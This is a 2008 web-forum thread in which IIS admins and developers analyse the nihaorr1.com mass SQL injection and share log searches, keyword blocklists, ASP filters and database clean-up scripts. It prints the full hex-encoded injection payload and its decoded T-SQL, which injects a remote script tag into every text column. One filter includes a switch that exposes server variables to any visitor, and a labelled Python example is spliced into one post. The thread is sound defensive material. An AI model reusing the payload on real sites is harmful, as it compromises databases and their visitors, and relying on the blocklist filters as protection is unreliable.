  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 25, 2008 03:42 PM|Rovastar

    Now the story is on Slashdot with links to this thread:

    http://it.slashdot.org/article.pl?sid=08/04/25/1358234

    So beware the LAMP trolls... *waves*... :) and the increased traffic to Steve's server. :) It also links to http://www.f-secure.com/weblog/archives/00001427.html which is a good summary of basically what is said in this thread with a few extras.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 25, 2008 03:49 PM|Rovastar

    xp_cmdshell

    You guys need to get a clue...it's called prepared statements.

    Thanks for that but who needs to get a clue?

    Have you ever been a web hosting admin? I expect not. You might be one of the few devs that can actually code properly, hence can fix the problem. Admins don't; we just have bad devs that cannot code properly and we try to minimise the damage. What can we do, shut down the database?

    It seems clear now that it is the slack devs' fault; you are casting blame in the wrong place.

    Troubleshoot IIS in style
    https://www.leansentry.com/
  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 25, 2008 05:12 PM|steve schofield|LINK

    Prepared statements generally are stored procedures, at least that is my understanding.  Dynamic SQL type pages can be exposed to sql injection attacks.  Of course if the stored procedure takes input without being validated, it can be also.  But it is one layer deeper.  Only good error coding can prevent it. 

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 25, 2008 05:45 PM|jdybka|LINK

     I use a filter called WebKnight to filter out SQL injection attempts and other crud. You can Google it - it's open source and can give you some .htaccess functionality for IIS.

    It is blocking these requests from China for us.

    It's installed as an isapi filter.

    Jilly
     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 25, 2008 06:32 PM|xp_cmdshell|LINK

    steve schofield

    Prepared statements generally are stored procedures, at least that is my understanding.  Dynamic SQL type pages can be exposed to sql injection attacks.  Of course if the stored procedure takes input without being validated, it can be also.  But is one layer deeper.  Only good error coding can prevent it. 

     

     

    Dim UserSuppliedString As String = Request.QueryString("UserSuppliedString")

    ' The value travels as a bound parameter; it is never spliced into the SQL text
    Dim cmd As New SqlCommand("SELECT * FROM blahblah WHERE id = @au_id")
    Dim param As New SqlParameter("au_id", SqlDbType.VarChar)
    param.Value = UserSuppliedString
    cmd.Parameters.Add(param)

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 26, 2008 05:56 AM|steve schofield|LINK

    Thanks for posting a clarification.  btw.

    For those who want to use Log parser to detect in your IISLogs if you've been hit, here are a few log parser examples.

    'This will find all webpages that had sql injection.  You can change the wording between the %% to look for a different string
    logparser -i:iisw3c "select date,time,cs-uri-stem,cs-uri-query from <example.com> where cs-uri-query like '%CAST%'" -o:csv

    'This will give you the first time your site was hit, if applicable. 
    logparser -i:iisw3c "select date,time,cs-uri-stem,cs-uri-query from <example.com> where cs-uri-query like '%1.js%'" -o:csv

    'Download Log Parser 2.2
    http://www.iis.net/downloads/default.aspx?tabid=34&g=6&i=1287

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Rovastar Rovastar

    5469 Posts

    MVP

    Moderator

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 26, 2008 12:28 PM|Rovastar|LINK

     steve, if they were encoded in hex

       DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
       4C00410052004500200040005400200076006100720063006800610072
       00280032003500350029002C0040004300200076006100720063006800
       610072002800320035003500290020004400450043004C004100520045
       0020005400610062006C0065005F00430075.........

    etc 

    wouldn't we have to search for something like that

     

    Troubleshoot IIS in style
    https://www.leansentry.com/
  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 26, 2008 01:30 PM|steve schofield|LINK

    The example I provided searches for text in the cs-uri-query IIS log file for the wildcard %CAST%, the percent signs are wild cards on both sides.  People can change the text to be %DECLARE% or variations.  I chose CAST because that seemed to be a common term.

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Rovastar Rovastar

    5469 Posts

    MVP

    Moderator

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 26, 2008 09:16 PM|Rovastar|LINK

    I see. CAST is a common term and is used in this attack. I believe another similar command, CONVERT, can be used instead as they have similar functionality.

    So, I believe, it does not have to be CAST.

    Troubleshoot IIS in style
    https://www.leansentry.com/
  • Rovastar Rovastar

    5469 Posts

    MVP

    Moderator

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 26, 2008 09:43 PM|Rovastar|LINK

    Also, for those of you that want a more detailed explanation of the deeper goings on of this attack.

    See this article. Interesting stuff.

    http://ddanchev.blogspot.com/2008/04/united-nations-serving-malware.html

    and here are more on the attack

    http://isc.sans.org/diary.html?storyid=4331 

    http://www.dynamoo.com/blog/2008/04/nihaorr1com-theres-no-such-thing-as.html

     

    Troubleshoot IIS in style
    https://www.leansentry.com/
  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 26, 2008 10:53 PM|alexhiggins732|LINK

    Hi,

     The use of this script pointing to nihaorr1.com is only the latest method of attack used by this attacker.  This guy has been hacking at a client's web site for a long time and usually does so through various proxy servers.  For those looking for a tool to view IIS log files, check out this program I have written http://www.alexanderhiggins.com/logfileparser.aspx

    To prevent the attacks I have done the following:

    1) Open notepad and paste the following code.  The code will check the request for a sql injection attack, and if it finds one it sends you an email and redirects the request to an error page.

    <%
    Dim str
    Dim r
    Dim badwords
    str = Request.ServerVariables("QUERY_STRING")

    If verify(str) = False Or (Request.QueryString("preview") = "true") Then
        Set myMail = CreateObject("CDO.Message")
        myMail.Subject = "Sending email with CDO"
        myMail.From = "youremailaddress@yourdomain.com"
        ' plain address: CDO.Message does not take a mailto: prefix
        myMail.To = "youremailaddress@yourdomain.com"

        Dim body
        For Each item In Request.ServerVariables
            body = body & item & "=" & Request.ServerVariables(item) & vbCrLf
        Next
        'For Each item In Request.Params
        '    body = body & item & "=" & Request.Params(item) & vbCrLf
        'Next
        myMail.TextBody = "This is a SQL Injection Hack Attempt.  Heres the details.  " & vbCrLf & vbCrLf & body
        If Request.QueryString("preview") = "true" Then
            ' ?preview=true shows the mail (all server variables) in the browser
            ' instead of sending it; note that any visitor can request it
            Response.Write("<pre>" & myMail.TextBody & "</pre>")
            Set myMail = Nothing
        Else
            myMail.Send
            Set myMail = Nothing
            Response.Redirect("urlscripterror.asp")
        End If
    End If
    'Response.Write(verify(str) & "<BR>")
    'Response.Write(str & "<BR>")
    'Response.Write(Request.ServerVariables.Count)
    'For Each item In Request.ServerVariables
    '    Response.Write(item & "=" & Request.ServerVariables(item) & "<BR>")
    'Next

    Function verify(s)
        Dim i

        ' convert the querystring to lowercase
        s = LCase(s)

        ' badwords - a list of disallowed keywords in the url
        badwords = "select insert update delete drop -- table alter cast convert exec chr( union"

        ' create an array of each bad word
        r = Split(badwords, " ")

        ' loop through the bad words and return False if one is present
        For i = 0 To UBound(r)
            If InStr(s, r(i)) > 0 Then
                verify = False
                Exit Function
            End If
        Next

        ' If no bad word was found then the request is verified
        verify = True
    End Function
    %>

     

    2) Save the file as urlfilter.asp and upload it to your web site root.

    3) Include the file by pasting the following code at the very beginning of your asp pages. Note if your site uses includes you can include it in a single include that is shared by all of your pages.

    <!-- #include virtual="/urlfilter.asp" -->

    From a security perspective, lock down your databases.  Perhaps allow only select permissions for anonymous viewers and have a different sql login and connection string for the backend where database updates are required.

    My issue with monitoring for EXEC commands is that by that point the damage is already done. Further, if the hacker is skilled enough they can compromise your entire server before you even realize they have attacked, using the right sql code.  

    Here is the email I received when this attack happened, with certain information replaced of course.

    This is a SQL Injection Hack Attempt.  Heres the details. 

    ALL_HTTP=HTTP_CONNECTION:keep-alive
    HTTP_CONTENT_LENGTH:0
    HTTP_CONTENT_TYPE:text/html
    HTTP_ACCEPT:text/html, */*
    HTTP_HOST:www.domainname.com
    HTTP_USER_AGENT:Mozilla/3.0 (compatible; Indy Library)

    ALL_RAW=Connection: keep-alive
    Content-Length: 0
    Content-Type: text/html
    Accept: text/html, */*
    Host: www.domainname.com
    User-Agent: Mozilla/3.0 (compatible; Indy Library)

    APPL_MD_PATH=/LM/W3SVC/1206399212/Root
    APPL_PHYSICAL_PATH=E:\domainname\web\
    AUTH_PASSWORD=
    AUTH_TYPE=
    AUTH_USER=
    CERT_COOKIE=
    CERT_FLAGS=
    CERT_ISSUER=
    CERT_KEYSIZE=
    CERT_SECRETKEYSIZE=
    CERT_SERIALNUMBER=
    CERT_SERVER_ISSUER=
    CERT_SERVER_SUBJECT=
    CERT_SUBJECT=
    CONTENT_LENGTH=0
    CONTENT_TYPE=text/html
    GATEWAY_INTERFACE=CGI/1.1
    HTTPS=off
    HTTPS_KEYSIZE=
    HTTPS_SECRETKEYSIZE=
    HTTPS_SERVER_ISSUER=
    HTTPS_SERVER_SUBJECT=
    INSTANCE_ID=1206399212
    INSTANCE_META_PATH=/LM/W3SVC/1206399212
    LOCAL_ADDR=xxx.xxx.xxx.xxx
    LOGON_USER=
    PATH_INFO=/attackedpage.asp
    PATH_TRANSLATED=E:\domainname\web\attackedpage.asp
    QUERY_STRING=date=4/17/2008%2011:05:00%20AM';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(...
    REMOTE_ADDR=219.153.46.28
    REMOTE_HOST=219.153.46.28
    REMOTE_USER=
    REQUEST_METHOD=POST
    SCRIPT_NAME=/lakewood_blueclaws_schedule.asp
    SERVER_NAME=www.domainname.com
    SERVER_PORT=80
    SERVER_PORT_SECURE=0
    SERVER_PROTOCOL=HTTP/1.0
    SERVER_SOFTWARE=Microsoft-IIS/6.0
    URL=/attackedpage.asp
    HTTP_CONNECTION=keep-alive
    HTTP_CONTENT_LENGTH=0
    HTTP_CONTENT_TYPE=text/html
    HTTP_ACCEPT=text/html, */*
    HTTP_HOST=www.domainname.com
    HTTP_USER_AGENT=Mozilla/3.0 (compatible; Indy Library)

    As you can see the attacker simply sent a malformed URL query, which of course is viewable in my IIS logs.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 27, 2008 03:03 AM|dlsfarcrxr|LINK

    I want to preface this comment with the following: I have very minimal experience with IIS and MS SQL. I do, however, have experience with MySQL. This post is not meant as flamebait.

    racekites

    ...

    passedString(0) = "DECLARE"
    passedString(1) = "NVARCHAR"
    passedString(2) = "SET"
    passedString(3) = "CAST"
    passedString(4) = "0x"
    passedString(5) = "("
    passedString(6) = ")"
    passedString(7) = "--"
    passedString(8) = "@"
    passedString(9) = ";"
    passedString(10) = "-"
    passedString(11) = "SELECT"
    passedString(12) = "declare"
    passedString(13) = "set"
    passedString(14) = "cast"
    passedString(15) = "nvarchar"

    ...

    Unless you are dealing with a database where you know what every single value is going to be, won't this result in false positives? For example, if a user enters a value of "b0x", this will match the "0x" in the list of bad words. Additionally, aren't there many ways to bypass a blacklist such as this (CAST, etc.)?

    Doesn't MS SQL Server have a method to escape certain characters? When I create a program that uses a MySQL database, I have two functions - EscapeMySQL and UnEscapeMySQL. When I have data from a user, it passes through EscapeMySQL before being stored in the database. When I read a value from the database, it passes through UnEscapeMySQL before being displayed. By escaping certain characters (backslash, quote, double quote, linefeed, carriage return, tab, etc.), I don't have to worry even if "DROP DATABASE" is in a string.

    --
    Dave

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 27, 2008 05:22 PM|fox1977|LINK

    Hi folks,

    Just a quick question, apologies if it sounds a bit stupid.  Are there any Microsoft patches available to prevent this happening (either on SQL or IIS) or should any protective measures be taken at the application level?

    I've just spent the weekend patching web servers anyway!

    Thanks
     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 27, 2008 06:19 PM|alexhiggins732|LINK

    Yes these will send up some false positives 

    passedString(0) = "DECLARE"
    passedString(1) = "NVARCHAR"
    passedString(2) = "SET"
    passedString(3) = "CAST"
    passedString(4) = "0x"
    passedString(5) = "("
    passedString(6) = ")"
    passedString(7) = "--"
    passedString(8) = "@"
    passedString(9) = ";"
    passedString(10) = "-"
    passedString(11) = "SELECT"
    passedString(12) = "declare"
    passedString(13) = "set"
    passedString(14) = "cast"
    passedString(15) = "nvarchar"

    Thats why in my post I have limited that blacklisted words to

     badwords= "select insert update delete drop -- table alter cast convert exec chr( union"

     Or

    passedString(0)= "select"
    passedString(1)= "insert"
    passedString(2)= "update"
    passedString(3)= "delete"
    passedString(4)= "drop"
    passedString(5)= "--"
    passedString(6)= "table"
    passedString(7)= "alter"
    passedString(8)= "cast"
    passedString(9)= "convert"
    passedString(10)= "exec"
    passedString(11) = "chr("
    passedString(12) = "union"

    Additionally, once a request is filtered, I receive an email so I can review and check for a false positive and adjust my code accordingly.

    As far as MS SQL having a function to prevent this, they do, and it's called stored procedures.  The problem is that most old school asp programming uses free text queries, which the hackers are taking advantage of here.  If the code were to use stored procedures this wouldn't be an issue.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 28, 2008 02:04 AM|yogorilla|LINK

    Thanks for all the info here guys, we were hit last week and this thread saved me a lot of time.

     On the subject of stored procs, I'm not sure that they will automatically solve the problem. I have one simple stored proc called from a form that could still provide a vehicle for executing the malicious code, validating the query or the individual parameters would still appear to be the best thing to do.

     

  • naziml naziml

    74 Posts

    Microsoft

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 28, 2008 04:17 PM|naziml|LINK

    I have put up a generic ASP SQL validation script on my blog post here.

    Hope this helps.

    ------------------------------------------------------ 

    Nazim

    IIS Security

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 03, 2008 06:09 PM|alexhiggins732|LINK

    How would stored procedures be vulnerable?  The parameters are converted to a string and are not executed as t-sql.  Try it out, I think you are confused.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 07, 2008 04:21 AM|bjornen|LINK

    Thanks a lot alexhiggins732 

    I added this script to the website and it seems to work very well already. Only a few hours after I set it up, he tried again. This time he was not able to destroy any data in the database. I got the email with the below information. Is there at all anything that can be done to pursue this guy?

    ALL_HTTP=HTTP_ACCEPT:text/html, */*
    HTTP_CONNECTION:keep-alive
    HTTP_HOST:www.mydomain.com
    HTTP_USER_AGENT:Mozilla/3.0 (compatible; Indy Library)
    HTTP_CONTENT_LENGTH:0
    HTTP_CONTENT_TYPE:text/html

    ALL_RAW=Accept: text/html, */*
    Connection: keep-alive
    Host: www.mydomain.com
    User-Agent: Mozilla/3.0 (compatible; Indy Library)
    Content-Length: 0
    Content-Type: text/html

    APPL_MD_PATH=/LM/W3SVC/24/Root
    APPL_PHYSICAL_PATH=E:\www\site\
    AUTH_PASSWORD=
    AUTH_TYPE=
    AUTH_USER=
    CERT_COOKIE=
    CERT_FLAGS=
    CERT_ISSUER=
    CERT_KEYSIZE=
    CERT_SECRETKEYSIZE=
    CERT_SERIALNUMBER=
    CERT_SERVER_ISSUER=
    CERT_SERVER_SUBJECT=
    CERT_SUBJECT=
    CONTENT_LENGTH=0
    CONTENT_TYPE=text/html
    GATEWAY_INTERFACE=CGI/1.1
    HTTPS=off
    HTTPS_KEYSIZE=
    HTTPS_SECRETKEYSIZE=
    HTTPS_SERVER_ISSUER=
    HTTPS_SERVER_SUBJECT=
    INSTANCE_ID=24
    INSTANCE_META_PATH=/LM/W3SVC/24
    LOCAL_ADDR=0.0.0.0
    LOGON_USER=
    PATH_INFO=/default.asp
    PATH_TRANSLATED=E:\www\file\default.asp
    QUERY_STRING=Folder=469&CompanyDirectory=1440&CompanyName=Bon+Bon+Guesthouse';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(...
    REMOTE_ADDR=60.169.3.130
    REMOTE_HOST=60.169.3.130
    REMOTE_USER=
    REQUEST_METHOD=POST
    SCRIPT_NAME=/default.asp
    SERVER_NAME=www.mydomain.com
    SERVER_PORT=80
    SERVER_PORT_SECURE=0
    SERVER_PROTOCOL=HTTP/1.0
    SERVER_SOFTWARE=Microsoft-IIS/5.0
    URL=/default.asp
    HTTP_ACCEPT=text/html, */*
    HTTP_CONNECTION=keep-alive
    HTTP_HOST=www.mydomain.com
    HTTP_USER_AGENT=Mozilla/3.0 (compatible; Indy Library)
    HTTP_CONTENT_LENGTH=0
    HTTP_CONTENT_TYPE=text/html

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 07, 2008 04:37 AM|bjornen|LINK

    By the way. I see he seems to be from China, but I assume this is not his real IP.

    IP: 60.169.3.130
    Country: CHINA
    Region: -
    City: -
    ISP: CHINANET ANHUI PROVINCE NETWORK

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 07, 2008 05:25 PM|greenlit_design|LINK

    Thanks for posting this. It did help. I just wanted to contribute also to the group. We got SQL injected last night by this and this is how I fixed it.

    1) First, to prevent the script from executing or any further issues:

    deny select on sysobjects to sql_login_of_your_app
    deny select on syscomments to sql_login_of_your_app
    deny select on syscolumns to sql_login_of_your_app
    deny select on systypes to sql_login_of_your_app

    The script won't even get access to the sys tables anymore (you can add more but these are the minimum).


    2) Use what the hacker used.

    select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

    That query tells you what was infected.
    After a night without sleep and a few hours later, here is the script that will go through all the tables / columns and remove that string.

    Hope this helps. Don't hesitate if you have questions.
    Thanks




    Use DBname --- (your actual DB infected)
    go

    -- (if needed) drop table tmp_tableInfected
    create table tmp_tableInfected
          (t varchar(100),
           c varchar(100),
           total int)

    -- (if needed) truncate table tmp_tableInfected

    Declare @sqlInjectString varchar(200)

    --- here you specify the sql inject string. They used 2 different ones in our case
    Set @sqlInjectString = '<script src=http://www.nihaorr1.com/1.js></script>'

    DECLARE @T varchar(255),
            @C varchar(255)

    set nocount on

    -- pass 1: record every text column that contains the string
    DECLARE Table_Cursor
    CURSOR FOR
    select top 10 a.name, b.name
    from sysobjects a, syscolumns b
    where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    and a.name not in ('t_article', 'tbl_reviews', 'tbl_articles', 'tbl_reviews_BK','tbl_spotlights_BK')
    order by a.name, b.name

    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN

          --print ('insert into tmp_tableInfected select '''
          --+  @T +  ''','''
          --+  @C + ''', count(*)  FROM [' + @T +'] (nolock) where ['
          --+ @C  + '] LIKE ''%'
          --+ @sqlInjectString + '%'' having count(*) > 0')

          Exec ('insert into tmp_tableInfected select '''
          +  @T +  ''','''
          +  @C + ''', count(*)  FROM [' + @T +'] (nolock) where ['
          + @C  + '] LIKE ''%'
          + @sqlInjectString + '%'' having count(*) > 0')

          FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor

    --DECLARE @T varchar(255),
    --@C varchar(255)

    -- pass 2: print the clean-up statements for review; uncomment the exec to run them
    DECLARE fixSQLInject_Cursor
    CURSOR FOR
    select t,c from tmp_tableInfected

    OPEN fixSQLInject_Cursor
    FETCH NEXT FROM fixSQLInject_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN

          Print 'update ' + @t + ' set ' + @c + ' = replace('+ @c + ',''' + @sqlInjectString + ''', '''')'
          --- exec ('update ' + @t + ' set ' + @c + ' = replace('+ @c + ',''' + @sqlInjectString + ''', '''')')

          FETCH NEXT FROM fixSQLInject_Cursor INTO @T,@C
    END
    CLOSE fixSQLInject_Cursor
    DEALLOCATE fixSQLInject_Cursor

    --select t,c,total from tmp_tableInfected

    drop table tmp_tableInfected

    powlette

    Long story short, it's definitely SQL injection. here's the offending url:

    orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000 4300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0072002000430055 00520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D00200073007900 73006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069 006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F0072002000 62002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D0031 0036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00 200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C00450028004000400046004500540043 0048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B00 27005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C 005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E00 6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045 00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000 
43004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075 00720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

    decoding that binary data which is cast to a varchar yields this:

    DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar'['+@C+']))+''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    And there you have it. It finds all text columns in the database and adds itself to it.
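    The same table-by-column sweep as an added example in Python against an in-memory SQLite database (not the poster's or powlette's code): it enumerates the text columns from the catalogue as the sysobjects/syscolumns join does, counts the rows carrying either tag seen in this thread, and strips them with a parameterised nested REPLACE, defaulting to a dry run like the script's Print line. The table names and rows are constructed; the second tag variant is the one powlette's decode shows.

```python
import sqlite3

# Tags this thread shows being appended to text columns: the one the T-SQL
# script above removes, and the shorter form in powlette's decode.
INJECTED_TAGS = (
    "<script src=http://www.nihaorr1.com/1.js></script>",
    "<script src=nihaorr1.com/1.js></script>",
)


def q(ident):
    """Quote an identifier taken from the catalogue (the [..] of the T-SQL)."""
    return '"' + ident.replace('"', '""') + '"'


def text_columns(conn):
    """Yield (table, column) for every text-affinity column of every user
    table; the SQLite counterpart of the sysobjects/syscolumns join."""
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite%'"
    ).fetchall()
    for (table,) in tables:
        for _cid, column, decl, *_ in conn.execute(f"PRAGMA table_info({q(table)})"):
            decl = (decl or "").upper()
            # SQLite gives TEXT affinity to declared types containing these
            if any(k in decl for k in ("CHAR", "CLOB", "TEXT")):
                yield table, column


def find_infected(conn, tags=INJECTED_TAGS):
    """Return {(table, column): rows_hit} for columns carrying any tag;
    the tmp_tableInfected pass of the T-SQL, with bound parameters."""
    found = {}
    for table, column in text_columns(conn):
        where = " OR ".join(f"{q(column)} LIKE ?" for _ in tags)
        sql = f"SELECT COUNT(*) FROM {q(table)} WHERE {where}"
        (n,) = conn.execute(sql, [f"%{t}%" for t in tags]).fetchone()
        if n:
            found[(table, column)] = n
    return found


def clean(conn, tags=INJECTED_TAGS, dry_run=True):
    """Strip every tag from every infected column with nested REPLACE().
    With dry_run=True the statements are returned but not run, like the
    script's Print line with the exec commented out."""
    statements = []
    for table, column in find_infected(conn, tags):
        expr = q(column)
        for _ in tags:
            expr = f"REPLACE({expr}, ?, '')"   # each tag is bound, not spliced in
        where = " OR ".join(f"{q(column)} LIKE ?" for _ in tags)
        sql = f"UPDATE {q(table)} SET {q(column)} = {expr} WHERE {where}"
        params = list(tags) + [f"%{t}%" for t in tags]
        statements.append((sql, params))
        if not dry_run:
            conn.execute(sql, params)
    if not dry_run:
        conn.commit()
    return statements


def build_sample_db():
    """In-memory database with constructed rows; the tag is appended to values
    the way the attack's rtrim(convert(varchar, col)) + '<script ...>' does,
    twice on one row to stand for a repeated hit."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tbl_articles (id INTEGER PRIMARY KEY, title VARCHAR(255), body TEXT);
        CREATE TABLE tbl_orders (id INTEGER PRIMARY KEY, qty INTEGER, note NVARCHAR(100));
    """)
    long_tag, short_tag = INJECTED_TAGS
    conn.executemany("INSERT INTO tbl_articles (title, body) VALUES (?, ?)", [
        ("Opening day" + long_tag, "Gates open at noon." + long_tag),
        ("Schedule" + long_tag + long_tag, "Posted weekly."),
        ("Clean row", "Nothing injected here."),
    ])
    conn.executemany("INSERT INTO tbl_orders (qty, note) VALUES (?, ?)", [
        (2, "rush" + short_tag),
        (1, None),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    for (table, column), n in find_infected(db).items():
        print(f"{table}.{column}: {n} row(s)")
    for sql, params in clean(db):          # dry run: review before running
        print(sql, params)
    clean(db, dry_run=False)
    print("after clean-up:", find_infected(db))
```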

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 08, 2008 12:49 AM|eftennis|LINK

    Your idea of denying select access to the sys objects seems to make the most sense of any ideas I have read about sql injectors.   That would appear to be a foolproof way of at least stopping the current attackers. 

     Has this worked for you?

    I tried to go in and do this, but, my sql login account does not appear to have permissions (I use a share sql server database on my hosting company).

    If I ask my hosting company to do the DENY is it as simple as the command you included in your post?

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 08, 2008 02:06 AM|greenlit_design|LINK

    eftennis

    Your idea of denying select access to the sys objects seems to make the most sense of any ideas I have read about sql injectors.   That would appear to be a foolproof way of at least stopping the current attackers. 

     Has this worked for you?

    I tried to go in and do this, but, my sql login account does not appear to have permissions (I use a share sql server database on my hosting company).

    If I ask my hosting company to do the DENY is it as simple as the command you included in your post?

     

    Yes. Deny select on .... to sql_login. You need to have SysAdmin privileges to do this. Your hosting company should actually do this. I don't know if they have a DBA. I assume it will work for us. I did a test login as the sql_login used for the app and tried to run the commands of the script, and I got the "permission denied" error. Let me know if you have any questions. Thanks
  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 08, 2008 02:26 AM|alexhiggins732|LINK

    bjornen

    Thanks a lot alexhiggins732 

    I added this script to the website and it seems to work very well already. Only few hours after I set it up, he tried again. This time he was not able to destroy any data in the database. I got the email with the below information. Is there at all anything that can be done to purue this guy?

     

    No problem. Like I said, I have had this in place for months and I know that it is working.  I would also suggest you download my IIS Log File Viewer and check out the log files in your web server.  Sql Injection hack attempts are usually easy to spot because the query strings are so long.

    As far as some of these ideas here, such as denying access to sys tables, I am sure they will work to an extent, but in a professional environment you may be dealing with hundreds or even thousands of databases and/or users, and all it really does is stop a hacker from discovering the names of databases, tables and columns in your database.  If your application is vulnerable to these types of attacks, you need to intercept them before they hit the database or a hacker will still be able to gain access to sensitive data like usernames, passwords and credit card information.

    As far as the post that searches cookies, form values, and query strings, I initially went that route but saw too many false positives, especially in the form values. I would recommend filtering form values in another manner.

     

    <%
    ' Usage <!-- #include virtual="stringfilters.asp"-->
    '
    ' For Each Item In Request.Form
    '    Request.Form(Item) = getUserInput(Request.Form(Item), -1)
    ' Next
    '
    ' alternately, if you know a string should be only a certain length
    ' specify the length -- for a first name -- getUserInput(Request.Form("FirstName"), 50)

    Dim pFilteringLevel
    pFilteringLevel = 0

    function getLoginField(input, stringLength)
        ' to filter login fields: keep only letters, digits and @ . _ -
        dim regEx
        Set regEx = New RegExp
        getLoginField = left(trim(input), stringLength)
        regEx.Pattern = "([^-_A-Za-z0-9@.])"
        regEx.IgnoreCase = True
        regEx.Global = True
        getLoginField = regEx.Replace(getLoginField, "")
        Set regEx = nothing
    end function

    function getUserInput(input, stringLength)
        dim newString, regEx
        Set regEx = New RegExp

        ' only specified length
        if not stringLength = -1 then
            newString = left(trim(input), stringLength)
        else
            newString = input
        end if

        if pFilteringLevel = 1 then
            regEx.Pattern = "([^A-Za-z0-9@=:/*|' _-]+.%)"
            regEx.IgnoreCase = True
            regEx.Global = True
            newString = regEx.Replace(newString, "")
            Set regEx = nothing

            newString = replace(newString, "--", "")
            newString = replace(newString, ";", "")
        end if

        if pFilteringLevel = 2 then
            ' neutralise the characters rather than strip them
            newString = replace(newString, "--", "")
            newString = replace(newString, ";", "&#59;")
            newString = replace(newString, "=", "&#61;")
            newString = replace(newString, "(", "&#40;")
            newString = replace(newString, ")", "&#41;")
            newString = replace(newString, "'", "&#39;")
            newString = replace(newString, """", "&#34;")
        end if

        if pFilteringLevel = 3 then
            newString = replace(newString, "'", "&#39;")
            newString = replace(newString, """", "&#34;")
        end if

        getUserInput = newString
    end function

    function getUserInputL(input, stringLength)
        ' light filtering
        dim tempStr
        tempStr = left(input, stringLength)
        tempStr = replace(tempStr, "--", "")
        tempStr = replace(tempStr, ";", "&#59;")
        tempStr = replace(tempStr, "=", "&#61;")
        tempStr = replace(tempStr, "(", "&#40;")
        tempStr = replace(tempStr, ")", "&#41;")
        tempStr = replace(tempStr, "CHAR", "&#67;&#72;&#65;&#82;")
        tempStr = replace(tempStr, "'", "&#39;")
        tempStr = replace(tempStr, """", "&#34;")
